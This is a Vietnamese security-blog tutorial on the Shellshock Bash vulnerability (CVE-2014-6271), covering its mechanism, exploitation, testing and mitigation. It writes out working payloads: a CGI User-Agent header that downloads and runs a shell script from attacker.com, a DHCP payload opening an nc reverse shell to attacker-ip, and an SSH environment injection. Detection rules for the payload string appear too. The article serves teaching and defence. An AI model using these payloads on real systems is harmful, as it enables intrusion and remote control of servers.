Bash Remote Code Execution Vulnerability: Cơ chế, Khai thác và Phòng chống
4 phút đọc18/09/2025
Về tác giả
My passion is hunting down the latest attack trends—ransomware, APTs, you name it—while passing on knowledge to help businesses forge ironclad defenses. I’ve left my mark on data encryption projects and intrusion detection tools now widely used across Vietnam. I’m the shadow that strikes before the enemy does.
@#@
Đam mê của tôi là nghiên cứu các xu hướng tấn công mới nhất như ransomware và APTs, đồng thời chia sẻ kiến thức để giúp doanh nghiệp xây dựng chiến lược phòng thủ hiệu quả. Tôi từng đóng góp vào các dự án mã hóa dữ liệu và phát triển công cụ phát hiện xâm nhập được sử dụng rộng rãi tại Việt Nam.
Cập nhật thông tin mới nhấtNhận các thông tin mới nhất về mối đe dọa, báo cáo an ninh mạng từ CyStack về hòm thư điện tử của bạn
{"success":true,"head":"<title>Bash Remote Code Execution Vulnerability: Cơ chế, Khai thác và Phòng chống</title>\n<meta name=\"description\" content=\"Bash Remote Code ExecutionVulnerability là lỗ hổng cho phép hacker thực thi mã từ xa trên hệ thống bằng cách lợi dụng cách Bash xử lý biến môi trường.\"/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-video-preview:-1, max-image-preview:large\"/>\n<link rel=\"canonical\" href=\"https://blog.cystack.org/tutorial/vi/2025/09/18/bash-remote-code-execution-vulnerability/\" />\n<meta property=\"og:locale\" content=\"en_US\" />\n<meta property=\"og:type\" content=\"article\" />\n<meta property=\"og:title\" content=\"Bash Remote Code Execution Vulnerability: Cơ chế, Khai thác và Phòng chống\" />\n<meta property=\"og:description\" content=\"Bash Remote Code ExecutionVulnerability là lỗ hổng cho phép hacker thực thi mã từ xa trên hệ thống bằng cách lợi dụng cách Bash xử lý biến môi trường.\" />\n<meta property=\"og:url\" content=\"https://blog.cystack.org/tutorial/vi/2025/09/18/bash-remote-code-execution-vulnerability/\" />\n<meta property=\"og:site_name\" content=\"CyStack Tutorial\" />\n<meta property=\"article:tag\" content=\"vi\" />\n<meta property=\"article:section\" content=\"An toàn thông tin\" />\n<meta property=\"og:updated_time\" content=\"2026-08-03T18:16:12+07:00\" />\n<meta property=\"og:image\" content=\"https://s2.cystack.net/tutorial/17160539/bash-remote-code-execution.png\" />\n<meta property=\"og:image:secure_url\" content=\"https://s2.cystack.net/tutorial/17160539/bash-remote-code-execution.png\" />\n<meta property=\"og:image:width\" content=\"1200\" />\n<meta property=\"og:image:height\" content=\"630\" />\n<meta property=\"og:image:alt\" content=\"bash remote code execution vulnerability\" />\n<meta property=\"og:image:type\" content=\"image/png\" />\n<meta property=\"article:published_time\" content=\"2025-09-18T09:31:50+07:00\" />\n<meta property=\"article:modified_time\" content=\"2026-08-03T18:16:12+07:00\" />\n<meta name=\"twitter:card\" content=\"summary_large_image\" />\n<meta name=\"twitter:title\" content=\"Bash Remote Code Execution Vulnerability: Cơ chế, Khai thác và Phòng chống\" />\n<meta name=\"twitter:description\" content=\"Bash Remote Code ExecutionVulnerability là lỗ hổng cho phép hacker thực thi mã từ xa trên hệ thống bằng cách lợi dụng cách Bash xử lý biến môi trường.\" />\n<meta name=\"twitter:image\" content=\"https://s2.cystack.net/tutorial/17160539/bash-remote-code-execution.png\" />\n<meta name=\"twitter:label1\" content=\"Written by\" />\n<meta name=\"twitter:data1\" content=\"Đức Hacker\" />\n<meta name=\"twitter:label2\" content=\"Time to read\" />\n<meta name=\"twitter:data2\" content=\"5 minutes\" />\n<script type=\"application/ld+json\" class=\"rank-math-schema\">{\"@context\":\"https://schema.org\",\"@graph\":[{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https://blog.cystack.org/tutorial/#person\",\"name\":\"CyStack Tutorial\"},{\"@type\":\"WebSite\",\"@id\":\"https://blog.cystack.org/tutorial/#website\",\"url\":\"https://blog.cystack.org/tutorial\",\"name\":\"CyStack Tutorial\",\"publisher\":{\"@id\":\"https://blog.cystack.org/tutorial/#person\"},\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https://s2.cystack.net/tutorial/17160539/bash-remote-code-execution.png\",\"url\":\"https://s2.cystack.net/tutorial/17160539/bash-remote-code-execution.png\",\"width\":\"1200\",\"height\":\"630\",\"caption\":\"bash remote code execution vulnerability\",\"inLanguage\":\"en-US\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https://blog.cystack.org/tutorial/vi/2025/09/18/bash-remote-code-execution-vulnerability/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":\"1\",\"item\":{\"@id\":\"https://blog.cystack.org/tutorial\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"position\":\"2\",\"item\":{\"@id\":\"https://blog.cystack.org/tutorial/vi/category/an-toan-thong-tin/\",\"name\":\"An to\\u00e0n th\\u00f4ng tin\"}},{\"@type\":\"ListItem\",\"position\":\"3\",\"item\":{\"@id\":\"https://blog.cystack.org/tutorial/vi/2025/09/18/bash-remote-code-execution-vulnerability/\",\"name\":\"Bash Remote Code Execution Vulnerability: C\\u01a1 ch\\u1ebf, Khai th\\u00e1c v\\u00e0 Ph\\u00f2ng ch\\u1ed1ng\"}}]},{\"@type\":\"WebPage\",\"@id\":\"https://blog.cystack.org/tutorial/vi/2025/09/18/bash-remote-code-execution-vulnerability/#webpage\",\"url\":\"https://blog.cystack.org/tutorial/vi/2025/09/18/bash-remote-code-execution-vulnerability/\",\"name\":\"Bash Remote Code Execution Vulnerability: C\\u01a1 ch\\u1ebf, Khai th\\u00e1c v\\u00e0 Ph\\u00f2ng ch\\u1ed1ng\",\"datePublished\":\"2025-09-18T09:31:50+07:00\",\"dateModified\":\"2026-08-03T18:16:12+07:00\",\"isPartOf\":{\"@id\":\"https://blog.cystack.org/tutorial/#website\"},\"primaryImageOfPage\":{\"@id\":\"https://s2.cystack.net/tutorial/17160539/bash-remote-code-execution.png\"},\"inLanguage\":\"en-US\",\"breadcrumb\":{\"@id\":\"https://blog.cystack.org/tutorial/vi/2025/09/18/bash-remote-code-execution-vulnerability/#breadcrumb\"}},{\"@type\":\"Person\",\"@id\":\"https://blog.cystack.org/tutorial/author/duchacker/\",\"name\":\"\\u0110\\u1ee9c Hacker\",\"url\":\"https://blog.cystack.org/tutorial/author/duchacker/\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https://secure.gravatar.com/avatar/7b8b6e4bc4811342b8e2f2134f90dda5961f2d4f8e7da5ec77e52bb909a19782?s=96&d=mm&r=g\",\"url\":\"https://secure.gravatar.com/avatar/7b8b6e4bc4811342b8e2f2134f90dda5961f2d4f8e7da5ec77e52bb909a19782?s=96&d=mm&r=g\",\"caption\":\"\\u0110\\u1ee9c Hacker\",\"inLanguage\":\"en-US\"}},{\"@type\":\"BlogPosting\",\"headline\":\"Bash Remote Code Execution Vulnerability: C\\u01a1 ch\\u1ebf, Khai th\\u00e1c v\\u00e0 Ph\\u00f2ng ch\\u1ed1ng\",\"keywords\":\"bash remote code execution vulnerability\",\"datePublished\":\"2025-09-18T09:31:50+07:00\",\"dateModified\":\"2026-08-03T18:16:12+07:00\",\"articleSection\":\"An to\\u00e0n th\\u00f4ng tin, B\\u1ea3o m\\u1eadt, RCE\",\"author\":{\"@id\":\"https://blog.cystack.org/tutorial/author/duchacker/\",\"name\":\"\\u0110\\u1ee9c Hacker\"},\"publisher\":{\"@id\":\"https://blog.cystack.org/tutorial/#person\"},\"description\":\"Bash Remote Code ExecutionVulnerability l\\u00e0 l\\u1ed7 h\\u1ed5ng cho ph\\u00e9p hacker th\\u1ef1c thi m\\u00e3 t\\u1eeb xa tr\\u00ean h\\u1ec7 th\\u1ed1ng b\\u1eb1ng c\\u00e1ch l\\u1ee3i d\\u1ee5ng c\\u00e1ch Bash x\\u1eed l\\u00fd bi\\u1ebfn m\\u00f4i tr\\u01b0\\u1eddng.\",\"name\":\"Bash Remote Code Execution Vulnerability: C\\u01a1 ch\\u1ebf, Khai th\\u00e1c v\\u00e0 Ph\\u00f2ng ch\\u1ed1ng\",\"@id\":\"https://blog.cystack.org/tutorial/vi/2025/09/18/bash-remote-code-execution-vulnerability/#richSnippet\",\"isPartOf\":{\"@id\":\"https://blog.cystack.org/tutorial/vi/2025/09/18/bash-remote-code-execution-vulnerability/#webpage\"},\"image\":{\"@id\":\"https://s2.cystack.net/tutorial/17160539/bash-remote-code-execution.png\"},\"inLanguage\":\"en-US\",\"mainEntityOfPage\":{\"@id\":\"https://blog.cystack.org/tutorial/vi/2025/09/18/bash-remote-code-execution-vulnerability/#webpage\"}}]}</script>\n"}
Bash Remote Code Execution (RCE) Vulnerability là một trong những lỗ hổng nghiêm trọng nhất từng được phát hiện trên Linux/Unix, cho phép hacker thực thi mã từ xa trên hệ thống bằng cách lợi dụng cách Bash xử lý biến môi trường.
Lỗ hổng này đã tồn tại trong hơn 20 năm trước khi được phát hiện vào năm 2014 với CVE-2014-6271, hay còn gọi là Shellshock. Ngay khi công bố, Shellshock đã trở thành một trong những lỗ hổng bị khai thác nhiều nhất, ảnh hưởng đến hàng triệu máy chủ, thiết bị IoT, hệ thống SCADA, cloud services và thậm chí cả thiết bị mạng (router, firewall, modem, v.v.).
Trong bài viết này, mình sẽ phân tích sâu về:
- Cơ chế hoạt động của Bash Remote Code Execution
- Chi tiết kỹ thuật về cách khai thác và xây dựng payload RCE
- Phương pháp kiểm tra hệ thống có bị ảnh hưởng không
- Hướng dẫn bảo vệ hệ thống Linux/Unix trước RCE
Nếu bạn là SysAdmin, Security Engineer hoặc Red Teamer, bài viết này sẽ giúp bạn hiểu rõ bản chất của lỗ hổng này từ góc nhìn tấn công & phòng thủ.

Cơ chế hoạt động của Bash Remote Code Execution
Bash là gì, phạm vi ảnh hưởng thế nào?
Bash (Bourne Again Shell) là trình shell mặc định trên hầu hết các hệ điều hành Linux, Unix, macOS và nhiều thiết bị IoT. Khi Bash xử lý các biến môi trường, nó có khả năng thực thi code trong chính các biến đó nếu không có cơ chế lọc thích hợp.
Lỗ hổng Bash RCE xảy ra khi:
- Một ứng dụng hoặc dịch vụ gọi Bash để xử lý input từ người dùng (ví dụ: CGI scripts trên Apache, SSH, DHCP client).
- Hacker đưa payload chứa mã độc vào biến môi trường (User-Agent, Referer, Cookie, SSH Command, DHCP Options, v.v.).
- Bash thực thi nội dung của biến môi trường như một lệnh shell, dẫn đến.
- Remote Code Execution.
Cấu trúc của Shellshock payload
() { :; }; <command_to_execute>
() { :; }; là cú pháp khai báo một hàm rỗng trong Bash.
<command_to_execute> là mã lệnh mà hacker muốn thực thi trên hệ thống.
Các ứng dụng dễ bị ảnh hưởng
Các hệ thống dễ bị khai thác Bash RCE bao gồm:
- Web servers chạy CGI scripts (Apache, Nginx, Lighttpd, v.v.)
- SSH servers chấp nhận environment variables từ user
- DHCP clients trên Linux có thể nhận payload từ DHCP server độc hại
- Cron jobs, startup scripts, hoặc bất kỳ ứng dụng nào gọi Bash mà không kiểm tra input
- Embedded systems, IoT devices chạy Linux kernel cũ
Cách hacker khai thác Bash Remote Code Execution
Tấn công vào web server (CGI Injection RCE)
Giả sử một máy chủ Apache có một CGI script bằng Bash xử lý request HTTP. Nếu không lọc input, hacker có thể chèn payload vào User-Agent hoặc Cookie header để thực thi mã độc.
Request HTTP độc hại hacker gửi:
GET /cgi-bin/vulnerable.cgi HTTP/1.1
User-Agent: () { :; }; /bin/bash -c 'echo Vulnerable!; id'
Nếu server phản hồi:
Vulnerable!
uid=33(www-data) gid=33(www-data) groups=33(www-data)
⇒ Chứng tỏ hệ thống đang bị khai thác! Hacker có thể tiếp tục tải backdoor & leo thang đặc quyền.
Tấn công thực tế:
GET /cgi-bin/vulnerable.cgi HTTP/1.1
User-Agent: () { :; }; /bin/bash -c 'wget <http://attacker.com/shell.sh> -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh'
Hacker sẽ tải về một reverse shell và kết nối từ xa vào máy chủ!
Tấn công qua DHCP Client (Network RCE)
Nếu một Linux client sử dụng DHCP để nhận IP, hacker có thể chèn payload RCE vào DHCP response để thực thi mã từ xa.
Payload độc hại từ DHCP server:
() { :; }; /bin/bash -c 'nc -e /bin/bash attacker-ip 4444'
Khi máy nạn nhân kết nối vào mạng WiFi công cộng bị kiểm soát, nó sẽ bị khai thác!
Xem thêm: Checklist kiểm thử thâm nhập mạng không dây WiFi
Tấn công qua SSH & Environment Variables
Nếu một user có quyền truy cập SSH nhưng bị giới hạn shell, họ có thể lợi dụng environment variables để thực thi mã độc.
Payload SSH khai thác Bash RCE:
SSH_ORIGINAL_COMMAND='() { :; }; /bin/bash -c "id; uname -a"' ssh user@target
Nếu hệ thống bị ảnh hưởng, lệnh id; uname -a sẽ được thực thi.
Cách kiểm tra hệ thống có bị ảnh hưởng không?
Chạy lệnh kiểm tra trên terminal:
env x='() { :; }; echo "Vulnerable!"' bash -c "echo Test"
Nếu hệ thống phản hồi:
Vulnerable!
Test
⇒ Máy chủ có thể bị khai thác!
Cách ngăn chặn Bash Remote Code Execution
Cập nhật Bash ngay lập tức
Cập nhật Bash trên Debian/Ubuntu:
sudo apt update && sudo apt upgrade bash
Cập nhật Bash trên CentOS/RHEL:
sudo yum update bash
Cập nhật Bash trên macOS:
brew update && brew upgrade bash
Chặn RCE trên Apache CGI
Vô hiệu hóa Bash trong CGI scripts trên Apache:
<Directory "/var/www/cgi-bin">
Options -ExecCGI
</Directory>
Chặn payload Bash RCE bằng ModSecurity:
SecRule REQUEST_HEADERS "@rx () { :; }" "id:1001,deny,status:403,msg:'Bash RCE Attack Blocked'"
Ngăn chặn SSH RCE
Tắt môi trường SSH không an toàn:
echo 'PermitUserEnvironment no' >> /etc/ssh/sshd_config
sudo systemctl restart sshd
Giám sát & phát hiện tấn công Bash RCE
Dùng Sysmon để phát hiện tiến trình bash bất thường:
<Sysmon>
<EventFiltering>
<RuleGroup name="Bash RCE Detection">
<CommandLine condition="contains">() { :; }</CommandLine>
</RuleGroup>
</EventFiltering>
</Sysmon>
Kết luận
Hi vọng bài viết về Bash Remote Code Execution Vulnerability này đã mang lại cho bạn nhiều thông tin hữu ích. Bạn đọc quan tâm hãy đăng ký nhận newsletter để cập nhật các thông tin mới nhất của CyStack.
BÀi viết cùng chủ đề: